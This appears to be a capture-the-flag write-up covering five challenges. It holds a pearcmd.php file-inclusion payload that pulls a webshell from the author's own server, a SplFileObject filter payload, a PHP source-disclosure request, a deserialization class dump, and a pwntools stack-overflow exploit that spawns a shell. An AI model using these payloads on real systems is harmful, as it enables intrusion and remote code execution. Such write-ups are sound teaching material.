Played around with this a bit; a fun competition, and I learned a lot.

Writing up a record of the challenges I solved; I'll reproduce the ones I didn't get to later.

0x00 ezinclude

While testing the include on the home page, I noticed that pearcmd.php exists:

pear reads its command-line arguments in pearcmd.php; the presence of pearcmd.php means pear is installed in this environment.

PHP's pear extension is a command-line extension manager, installed by default at /usr/local/lib/php/pearcmd.php. On the command line it is run as pear (that is, php /usr/local/lib/php/pearcmd.php). Although it is not under the web root, a file-inclusion vulnerability makes it possible to run this command-line tool.

Put the webshell on my own VPS and have the target download it remotely.

Exploitation:

sdpc=/usr/local/lib/php/pearcmd.php&+install+-R+/tmp+http://<ip>/8848.php

Then pass ?sdpc=/tmp/tmp/pear/download/8848.php; AntSword connects successfully, and the flag is in /var/www/public/flag.php.

0x01 ezphp

<?php
error_reporting(0);
highlight_file(__FILE__);
$g = $_GET['g'];
$t = $_GET['t'];
echo new $g($t);

Seeing echo new $g($t); suggests this tests native class abuse; consider the SplFileObject class.

The echo triggers SplFileObject's __toString() method.

?g=SplFileObject&t=php://filter/read=convert.base64-encode/resource=flag.php

Learn more: click here

0x02 funnyPHP

PHP <= 7.4.21 remote source-code disclosure vulnerability

Untick the Content-Length option:

Send the request:

GET /puzzle.php HTTP/1.1
Host: 47.104.14.160:3345

GET / HTTP/1.1

This returns the source of puzzle.php:

<?php
error_reporting(0);

class A{
    public $sdpc = ["welcome" => "yeah, something hidden."];

    function __call($name, $arguments)
    {
        $this->$name[$name]();
    }

}


class B{
    public $a;

    function __construct()
    {
        $this->a = new A();
    }

    function __toString()
    {
        echo $this->a->sdpc["welcome"];
    }

}

class C{
    public $b;
    protected $c;

    function __construct(){
        $this->c = new B();
    }

    function __destruct(){
        $this->b ? $this->c->sdpc('welcom') : 'welcome!'.$this->c;
    }
}

class Evil{
    function getflag() {
        echo file_get_contents('/fl4g');
    }
}


if(isset($_POST['sdpc'])) {
    unserialize($_POST['sdpc']);
} else {
    serialize(new C());
}


?>

Here we go again, the nasty deserialization POP-chain puzzle > <.

0x03 ez_stack

main:

int __cdecl v(int a1)
{
  char s[68]; // [esp+0h] [ebp-48h] BYREF

  io();
  printf("Password reset 2.0 : ");
  gets(s);
  if ( a1 != -20221119 )
    return puts(asc_804A02E);
  puts(asc_804A01E);
  return system("/bin/sh");
}

From the code, reaching return system("/bin/sh") requires a1 to equal -20221119.

The cmp instruction is at .text address 0x080492B3; set a breakpoint there and debug after the overflow:

from pwn import *

io = process("./ez_stack")
gdb.attach(io,"b * 0x80492B3")
sleep(1)
io.recvuntil("Password reset 2.0 : ")
payload = cyclic(100)
io.sendline(payload)

io.interactive()

Inspecting the value at ebp+0x8, cyclic -l 0x61616175 shows it sits at position 81 (80 characters precede it).

from pwn import *

io = remote('1.13.251.106','8000')
#io = process("./ez_stack")
#gdb.attach(io,"b * 0x80492B3")
#sleep(1)
io.recvuntil("Password reset 2.0 : ")
# 80 bytes of padding reach ebp+8 (a1); 0xfecb7341 is -20221119 as an unsigned 32-bit value.
# The padding must be bytes, not str, or concatenating with p32() raises a TypeError on Python 3.
payload = b'a'*80+p32(0xfecb7341)
io.sendline(payload)

io.interactive()
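As an added example (not code from the original write-up), here is where the two numbers in that payload come from: the 80 bytes of padding, cross-checked both from the decompiled stack layout (s at ebp-0x48, a1 at ebp+8) and by re-implementing the cyclic pattern lookup that cyclic -l performs, plus the 32-bit two's-complement form of -20221119. It assumes pwntools' default lowercase alphabet and 4-byte subsequences.

```python
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"  # pwntools' default cyclic alphabet


def de_bruijn(n: int = 4, alphabet: bytes = ALPHABET) -> bytes:
    """De Bruijn sequence B(k, n): every n-byte window occurs exactly once.
    Standard FKM (Lyndon word) construction; for this alphabet it yields the
    same ordering as pwntools' cyclic(), starting 'aaaabaaacaaad...'."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                out.extend(alphabet[a[j]] for j in range(1, p + 1))
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(out)


def cyclic(length: int) -> bytes:
    """First `length` bytes of the pattern (what cyclic(100) sent above)."""
    return de_bruijn()[:length]


def cyclic_find(value: int) -> int:
    """Offset of a 32-bit little-endian value in the pattern, i.e. the
    number `cyclic -l 0x61616175` reports (0x61616175 is b'uaaa')."""
    return de_bruijn().find(struct.pack("<I", value))


def expected_offset(buf_from_ebp: int = 0x48, arg_from_ebp: int = 8) -> int:
    """Distance from the start of s to a1, read off the decompiler comment:
    s lives at ebp-0x48 and the first argument at ebp+8."""
    return buf_from_ebp + arg_from_ebp


def as_uint32(value: int) -> int:
    """Unsigned 32-bit (two's complement) view of a signed constant, which
    is what p32() needs: -20221119 -> 0xfecb7341."""
    return struct.unpack("<I", struct.pack("<i", value))[0]


if __name__ == "__main__":
    print(cyclic(100))
    print(cyclic_find(0x61616175), expected_offset())  # both 80
    print(hex(as_uint32(-20221119)))                    # 0xfecb7341
```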

0x04 CheckIn

282422904082982258621075610259452215824075271484821245626055284049965141753838118483499225118037659155776469308266679236514939371151200503486860900710638249138056870980395564136760046944176702722154502092895865522544199762580857041717582699398798829888596539858995029585412945532785867079274113878154724845910389733183058666310229884356997245

Convert to hexadecimal:

4d752e4368656e5f69735f7468655f6d6f73745f68616e64736f6d655f626f795f696e5f534450435f616e645f68655f646f6e27745f686176655f6769726c667269656e642121212121212142795f7468655f7761795f686572655f69735f796f75725f666c61677b37303562633765612d653965312d343939362d613238662d6464393632613737373137307d

Then convert to characters:

Mu.Chen_is_the_most_handsome_boy_in_SDPC_and_he_don't_have_girlfriend!!!!!!!By_the_way_here_is_your_flag{705bc7ea-e9e1-4996-a28f-dd962a777170}